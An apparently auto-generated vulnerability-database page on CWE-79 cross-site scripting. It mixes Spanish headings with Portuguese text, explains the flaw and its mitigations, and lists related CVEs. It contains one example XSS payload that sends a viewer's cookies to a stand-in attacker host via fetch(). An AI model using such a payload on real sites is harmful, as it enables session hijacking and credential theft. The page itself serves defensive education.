Fallos del tipo CWE-79

28.941 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2023-1241HIGHCross-site Scripting (XSS) - Stored in answerdev/answerEPSS 0.6%CVE-2023-45818MEDIUMCross-site Scripting vulnerability in TinyMCE undo/redo, getContent API, resetContent API, and Autosave pluginEPSS 0.6%CVE-2023-38491MEDIUMKirby vulnerable to Cross-site scripting (XSS) from MIME type auto-detection of uploaded filesEPSS 0.6%CVE-2021-24587—Splash Header < 1.20.8 - Authenticated Stored Cross-Site Scripting (XSS)EPSS 0.6%CVE-2023-22722MEDIUMglpi subject to Cross-site Scripting (XSS) - Reflected EPSS 0.6%CVE-2022-3896MEDIUMWP Affiliate Platform <= 6.3.9 - Reflected Cross-Site ScriptingEPSS 0.6%CVE-2024-25602CRITICALStored cross-site scripting (XSS) vulnerability in Users Admin module's edit user page in Liferay Portal 7.2.0 through 7.4.2, and older unsuEPSS 0.6%CVE-2024-3004LOWcode-projects Online Book System Product.php cross site scriptingEPSS 0.6%CVE-2022-0510MEDIUMCross-site Scripting (XSS) - Reflected in pimcore/pimcoreEPSS 0.6%CVE-2020-35740HIGHHGiga MailSherlock - XSS -1EPSS 0.6%CVE-2022-0941HIGHStored XSS due to Unrestricted File Upload in star7th/showdocEPSS 0.6%CVE-2020-35741HIGHHGiga MailSherlock - XSS -2EPSS 0.6%CVE-2022-23461MEDIUMCross-Site Scripting (XSS) in Jodit EditorEPSS 0.6%CVE-2022-0822MEDIUMCross-site Scripting (XSS) - Reflected in orchardcms/orchardcoreEPSS 0.6%CVE-2023-3787LOWCodecanyon Tiva Events Calender cross site scriptingEPSS 0.6%CVE-2023-44852HIGHCross Site Scripting (XSS) vulnerability in Cobham SAILOR VSAT Ku v.164B019, allows a remote attacker to execute arbitrary code via a crafteEPSS 0.6%CVE-2020-26221HIGHStored Cross Site Scripting in touchbase.aiEPSS 0.6%CVE-2023-3989LOWSourceCodester Jewelry Store System add_customer.php cross site scriptingEPSS 0.6%CVE-2022-0348MEDIUMCross-site Scripting (XSS) - Stored in pimcore/pimcoreEPSS 0.6%CVE-2022-34857MEDIUMWordPress SP Project & Document Manager plugin <= 4.59 - Reflected Cross-Site Scripting (XSS) vulnerabilityEPSS 0.6%